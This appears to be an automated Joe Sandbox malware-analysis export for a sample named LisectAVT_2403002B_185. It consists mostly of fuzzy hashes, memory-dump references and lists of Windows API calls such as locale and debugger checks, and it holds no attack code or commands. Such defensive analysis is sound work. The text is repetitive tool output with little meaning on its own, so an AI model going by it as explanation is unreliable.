                                                              • Instruction ID: 5ff65d2ec74d3371661dc1d3d3e9379be4fc7fe4148e7a401d5a0161c1ec0543
                                                              • Opcode Fuzzy Hash: 56b1c12b65d7ef96c005c94ff03e0dae73d9c17246bab99fb35df3000138ad03
                                                              • Instruction Fuzzy Hash: FFD06C3204010DBBDF029F84DD06EDA3BAAFB48754F018000BA1856020C732E821AB90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 38490173a6b805f0aacc6c40b31ca9f662833a9518f20f5c94b5c6dd1eed64f1
                                                              • Instruction ID: b6c531a883d1f6d7bf45f0247e8dc65e3c88a549b002b93e0acac339aba731e3
                                                              • Opcode Fuzzy Hash: 38490173a6b805f0aacc6c40b31ca9f662833a9518f20f5c94b5c6dd1eed64f1
                                                              • Instruction Fuzzy Hash: 26F08C7A90820CEFCF18EFB4F41A5EDBBB0FB44219F00446AE50693280DA345A45CFC1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4140c26a2b393dbe1754ee7eae8ac2a89dbd8e2746996ee6b88a570900ed9a34
                                                              • Instruction ID: 94d853cabd24d79d78856dd4fd0f79234839422b63bb467e3097282afcae4925
                                                              • Opcode Fuzzy Hash: 4140c26a2b393dbe1754ee7eae8ac2a89dbd8e2746996ee6b88a570900ed9a34
                                                              • Instruction Fuzzy Hash: 18F0F6767093614FD7018B799C549BBBFE9EF8922170444BBF584C7391CAB0CC048750
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f3168f9afb9e0f9e1c3fb5d7d3a8da423647a3a4595238ff3ed79a062b7f1cb9
                                                              • Instruction ID: ca1bb00158bb18e18ad0bca0049eacf5e7002f7f131496c968359cb1cdf5d8fd
                                                              • Opcode Fuzzy Hash: f3168f9afb9e0f9e1c3fb5d7d3a8da423647a3a4595238ff3ed79a062b7f1cb9
                                                              • Instruction Fuzzy Hash: B4016DF251630CEFC704AF74F01A6997FF4EF45224F6441AAD4099B791CB3A29498B92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2622485361.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3790000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ac919370fe6420dfd38265e88a056454a554bb3594afdc92b5ec4e04cb9e80c3
                                                              • Instruction ID: a1841f4ab62d7328da98fc3508901881752351fc3edb1391ddc6fd85c7b1684f
                                                              • Opcode Fuzzy Hash: ac919370fe6420dfd38265e88a056454a554bb3594afdc92b5ec4e04cb9e80c3
                                                              • Instruction Fuzzy Hash: A0016970E0020A8FDB44DFA8C445AAEBFB1BF49300F1082A9C5089B356D7749984CFD0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8577a24e797d3fcb2401dd7ad4de071b05aaee8baed9765f0bbfd6599cfe9911
                                                              • Instruction ID: 2d1263535f771aa303251370aff3ca34e0458544c2369aa00dd529cfc721d3de
                                                              • Opcode Fuzzy Hash: 8577a24e797d3fcb2401dd7ad4de071b05aaee8baed9765f0bbfd6599cfe9911
                                                              • Instruction Fuzzy Hash: 63F0F672704258AFCB169778D8586BF7FFAEF89120B04096BD089C7310CB34AC45C761
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 72debb079e92504fd51ef186bf8a0314c0776c2c442a2bd957990d983a0d706d
                                                              • Instruction ID: c94e7f5f7408f6ca593caea9525786d9557987cfa4ca2ae39d02e439f9b32bcd
                                                              • Opcode Fuzzy Hash: 72debb079e92504fd51ef186bf8a0314c0776c2c442a2bd957990d983a0d706d
                                                              • Instruction Fuzzy Hash: EEF0F0B62043046BC306A67DE84099BBFAADFC2260744867ED14D8FB15CE21ED09C7E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d9997a26a5a146cbe7dce91e198c3bc957280c6fd8132246945fb1b18b259b35
                                                              • Instruction ID: 0138a4a5b339393992d46fd64566846ff1050094f98f64bcc2112e8cc1034a45
                                                              • Opcode Fuzzy Hash: d9997a26a5a146cbe7dce91e198c3bc957280c6fd8132246945fb1b18b259b35
                                                              • Instruction Fuzzy Hash: C5F0BE363093651FD7108A6A9C449BBBFEDEFC9620B04447AF984C3351CAB0CD0087A0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b18859dbd7df302c4b9f2ac96e33033cea92f6a9faeae6a165240bdafb8aa841
                                                              • Instruction ID: 3ecf3661fac6f02cd185f8f21f485bf0406fb8348cd10582a3b8a7ee301518bf
                                                              • Opcode Fuzzy Hash: b18859dbd7df302c4b9f2ac96e33033cea92f6a9faeae6a165240bdafb8aa841
                                                              • Instruction Fuzzy Hash: AFE0D83754A3642BCF1F6659A8144B57F788EC213030609BBD8AAD761284055D4187BD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 73c8547ff8395997c814de926ef9f0c3c6c8ee503256cf2bbde6c59e4f39bc22
                                                              • Instruction ID: b6971069caea9619f0ab16882a8e64274098081c37d9a09e99fe953570ef1d60
                                                              • Opcode Fuzzy Hash: 73c8547ff8395997c814de926ef9f0c3c6c8ee503256cf2bbde6c59e4f39bc22
                                                              • Instruction Fuzzy Hash: D0F08272700619AFCB149A59E88896FBBEEEB88620B00092EE009C7310DF34AD458791
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2622485361.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3790000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a2ab9be3080cd92bb3f7a3c1ab657a66a63e1d5d8b9fea39b13936b4b09ba469
                                                              • Instruction ID: f0b5420f55221ac1370f69d3e66f5babc976d99ccf05b7c78f395d7c41761b1f
                                                              • Opcode Fuzzy Hash: a2ab9be3080cd92bb3f7a3c1ab657a66a63e1d5d8b9fea39b13936b4b09ba469
                                                              • Instruction Fuzzy Hash: 1001EF70E4430A9FDB44DFA8C441AAEBFB1BF48300F1085A9C549EB356DBB49A858BD1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7a2c34c8d2a8621660cddf20b371d8ad64ca2d30a9524a79292fd05b12b51b0a
                                                              • Instruction ID: b8241a734659b599c2a3f0c9734aecfc73eba2550329aaadd3f19cb148f9eb7a
                                                              • Opcode Fuzzy Hash: 7a2c34c8d2a8621660cddf20b371d8ad64ca2d30a9524a79292fd05b12b51b0a
                                                              • Instruction Fuzzy Hash: 79F0A7B63003056BC305A66DE88495BBBAADFC5664754853DD10D8B714DE31EC15C7D4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 135d9921c6ac66376c6c294231e0ffa1a197c747ece177f00f6972eaf93bb2d6
                                                              • Instruction ID: a0873bfc108257331afcb7bd8bda40f066fcb55f4f290001540f181aa3955169
                                                              • Opcode Fuzzy Hash: 135d9921c6ac66376c6c294231e0ffa1a197c747ece177f00f6972eaf93bb2d6
                                                              • Instruction Fuzzy Hash: 08F0A03D7005198FDB04D76D98489A97BE6FFC835171141AAE90ACB324DB21CD128B91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c44aa0dc0d7bad0b173dc8d22a4fd95d68ab8850e7a58e82f984f7189f267b4f
                                                              • Instruction ID: dae95a0b7c6cb1f265c48374b8524283192c69725e4ea79c996e07346e0d16d0
                                                              • Opcode Fuzzy Hash: c44aa0dc0d7bad0b173dc8d22a4fd95d68ab8850e7a58e82f984f7189f267b4f
                                                              • Instruction Fuzzy Hash: 38E02B767083015FC725D6B5E858BA67795DB85231F04443FD909C7751D934CC01C3A0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e41ec625af3cc84fea91da358d160f62ec5fa15d2487774bc9bd05c121bbe2e5
                                                              • Instruction ID: 4c5640cfe028fd9667c827945683d29b16c7acce2bab05c6e8a9c880466ed570
                                                              • Opcode Fuzzy Hash: e41ec625af3cc84fea91da358d160f62ec5fa15d2487774bc9bd05c121bbe2e5
                                                              • Instruction Fuzzy Hash: B3F08C2054E2E04FDB06AB3DE97A6C87F71EF83210B0800EBD0C1DA167D8194888C35A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 990f2ea1957a1f5c4112c4164456e0f32680bfb4d9397a3446d5373ac690959d
                                                              • Instruction ID: 6fd1b6493c5b911690be5259324990117f603180e890ed83f465977a917d9f77
                                                              • Opcode Fuzzy Hash: 990f2ea1957a1f5c4112c4164456e0f32680bfb4d9397a3446d5373ac690959d
                                                              • Instruction Fuzzy Hash: 9AE026133041510B8E2D25B8261C7FB678BAFC24A030A45B7C908EB662DC808D1543E2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92c75de1bd1ba25ab25b64c7408cc67142b027add2eb7e6e600be17a54f432dc
                                                              • Instruction ID: 472caf95ee12265a45ce70a16d68ff853a1b5605c0b636c8fcba878cded71369
                                                              • Opcode Fuzzy Hash: 92c75de1bd1ba25ab25b64c7408cc67142b027add2eb7e6e600be17a54f432dc
                                                              • Instruction Fuzzy Hash: CAE0C22730D3A117CB1E91BE78304A67FAA87C6020309C4BBE409C7242CC518E0A43E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fe15f894c960312b4a8673b0f9dc18068bfca9317e51fcc7777cc8700ab9be64
                                                              • Instruction ID: de44ddd93ddb36a031045b5e4214f831f7df02cf879666fe1bf7ecf3efd6c89d
                                                              • Opcode Fuzzy Hash: fe15f894c960312b4a8673b0f9dc18068bfca9317e51fcc7777cc8700ab9be64
                                                              • Instruction Fuzzy Hash: 50E0D875216358AFCF022734781A49D3F649B81234B040157E416C77C2CE2C1A0483E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6d95bb62f1aa1f1026f988729a83ceb2e0bfeefc809a4c4832750ecef88f8236
                                                              • Instruction ID: f9eb2e4a74327a69167da6660d8c84b8c50e724d7376cbcc973b4020ac862318
                                                              • Opcode Fuzzy Hash: 6d95bb62f1aa1f1026f988729a83ceb2e0bfeefc809a4c4832750ecef88f8236
                                                              • Instruction Fuzzy Hash: A5E0487A9081089BCB14EF78E8564F97FB4FB44251F1041A6D915937C0DA215C41CFE1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aabe822960d658039b7386ee8b9f185b960e2d7d5b539b2c127b51a16b2fd698
                                                              • Instruction ID: 6716cfd64ffef0fdfd725cee726cfd18ba4a8e1c83eedd8b59ab0d45b220f4a7
                                                              • Opcode Fuzzy Hash: aabe822960d658039b7386ee8b9f185b960e2d7d5b539b2c127b51a16b2fd698
                                                              • Instruction Fuzzy Hash: D7D05E52304125174D2C30BE291C7BBA3CFAFC68B074905369A05D3751EC81CC0113E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_3_5c90000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a5425d721552cb562b98988a0438eba3854f3debd91fddd5f666a32221727015
                                                              • Instruction ID: b7fddcd554e3fa336fa40f20099f0faa2ae4aca8836e9e58bba87b812ff40b30
                                                              • Opcode Fuzzy Hash: a5425d721552cb562b98988a0438eba3854f3debd91fddd5f666a32221727015
                                                              • Instruction Fuzzy Hash: 45E04FF191730CBFC790AB74F05A7243BE5E705310F5400AAD809DB741DA7D59A48B92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000003.2552168143.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              APIs
                                                                • Part of subcall function 005F642F: GetLastError.KERNEL32(00000000,?,005FC60C), ref: 005F6433
                                                                • Part of subcall function 005F642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 005F64D5
                                                              • GetACP.KERNEL32(?,?,?,?,?,?,005F4239,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 006019B6
                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,005F4239,?,?,?,00000055,?,-00000050,?,?), ref: 006019ED
                                                              • _wcschr.LIBVCRUNTIME ref: 00601A81
                                                              • _wcschr.LIBVCRUNTIME ref: 00601A8F
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00601B50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                              • String ID: utf8
                                                              • API String ID: 4147378913-905460609
                                                              • Opcode ID: af302935b80df9c9a2f058be6853b4f06efa18cfbe5af4b516383de1e25cb7f4
                                                              • Instruction ID: fff55ee18260e0688042a93d6f7287622bd8d3ffde967d3ac4d6d933784f2efc
                                                              • Opcode Fuzzy Hash: af302935b80df9c9a2f058be6853b4f06efa18cfbe5af4b516383de1e25cb7f4
                                                              • Instruction Fuzzy Hash: A771F671681606AADB2CAB74CC96BFB73AAFF46700F10052AF605DF2C1FB7499408765
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: __floor_pentium4
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 4168288129-2761157908
                                                              • Opcode ID: 521076089cb4440f6a0b3b7eb04aaa6a4952ae55f24209473d54de9b93759395
                                                              • Instruction ID: e5ccde2d5bd3c459ff7ef980609853cd1cec2446c8d9619fe36a257c40d60129
                                                              • Opcode Fuzzy Hash: 521076089cb4440f6a0b3b7eb04aaa6a4952ae55f24209473d54de9b93759395
                                                              • Instruction Fuzzy Hash: 29D23CB1E485298FDB68CE24CC447EAB7BAEB44305F1445EAD54DE7280EB75AE818F40
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000000,2000000B,006023A2,00000002,00000000,?,?,?,006023A2,?,00000000), ref: 00602129
                                                              • GetLocaleInfoW.KERNEL32(00000000,20001004,006023A2,00000002,00000000,?,?,?,006023A2,?,00000000), ref: 00602152
                                                              • GetACP.KERNEL32(?,?,006023A2,?,00000000), ref: 00602167
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID: ACP$OCP
                                                              • API String ID: 2299586839-711371036
                                                              • Opcode ID: 24e827d3273f45b7b8b6c58a7e16dd7cb1fb561fe3b154844f4dcc7a304ab3d2
                                                              • Instruction ID: 9aa40adbe9a9ea4b538de09b19b021f34bd07abaeff8936e8e89fb2b2be2a5cd
                                                              • Opcode Fuzzy Hash: 24e827d3273f45b7b8b6c58a7e16dd7cb1fb561fe3b154844f4dcc7a304ab3d2
                                                              • Instruction Fuzzy Hash: 7A21A132780206A6DB3C8F14CD6DAD773A7AF54B54B5684A4EB0AD7390E732DD81C350
                                                              APIs
                                                                • Part of subcall function 005F642F: GetLastError.KERNEL32(00000000,?,005FC60C), ref: 005F6433
                                                                • Part of subcall function 005F642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 005F64D5
                                                              • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00602374
                                                              • IsValidCodePage.KERNEL32(00000000), ref: 006023B2
                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 006023C5
                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0060240D
                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00602428
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                              • String ID:
                                                              • API String ID: 415426439-0
                                                              • Opcode ID: 7790d5b580370f10a87637d721b8f949cc8d3097e701c5d7a73f2f4e135a5735
                                                              • Instruction ID: 326257ad0c78d58d7291cead926f80967fb083787733e16ba049169aa65b3b45
                                                              • Opcode Fuzzy Hash: 7790d5b580370f10a87637d721b8f949cc8d3097e701c5d7a73f2f4e135a5735
                                                              • Instruction Fuzzy Hash: 72519171A8020AABDB18DFA4CC99AFF77BAFF04700F144469E501EB2D1E774D9408B61
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 005EA523
                                                              • IsDebuggerPresent.KERNEL32 ref: 005EA5EF
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005EA60F
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 005EA619
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: cd90936d8a0b1188aeac6fbce6a40717ad9891b3aef8d290c5d06c1f1f5754f1
                                                              • Instruction ID: d7f53c38488a1618d6ea38033d30754b68cfd756cb8c4b6a3289c61f9dcf5289
                                                              • Opcode Fuzzy Hash: cd90936d8a0b1188aeac6fbce6a40717ad9891b3aef8d290c5d06c1f1f5754f1
                                                              • Instruction Fuzzy Hash: E53138B5D4125D9BDB10DFA1D9897CDBBB8FF08300F1040AAE44DAB250EB719A85CF55
                                                              APIs
                                                                • Part of subcall function 005F642F: GetLastError.KERNEL32(00000000,?,005FC60C), ref: 005F6433
                                                                • Part of subcall function 005F642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 005F64D5
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00601D68
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00601DB2
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00601E78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale$ErrorLast
                                                              • String ID:
                                                              • API String ID: 661929714-0
                                                              • Opcode ID: 3eb368c4c1abb9a9a3e9005d9c506deafda0a1c16f45cea3d32a3051edeb0ed7
                                                              • Instruction ID: f650e67492d48bbe7353b34562f87c160b34d9eb41ba773cc9a7ff9b2783fb70
                                                              • Opcode Fuzzy Hash: 3eb368c4c1abb9a9a3e9005d9c506deafda0a1c16f45cea3d32a3051edeb0ed7
                                                              • Instruction Fuzzy Hash: 47618C715902079FDB28AF24CD86BABB7BAFF45300F1040A9EE05CA2D5E734E981CB50
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,005E112E), ref: 005F1339
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,005E112E), ref: 005F1343
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,005E112E), ref: 005F1350
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2620612452.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                              • Associated: 00000000.00000002.2620581577.00000000005E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620659005.0000000000609000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620685106.0000000000618000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2620709136.000000000061A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5e0000_LisectAVT_2403002B_185.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: fae35ebe87516e02c0f0bf487ac7506629a6c036fab7dd0aa9bbd0b92e43d1b0
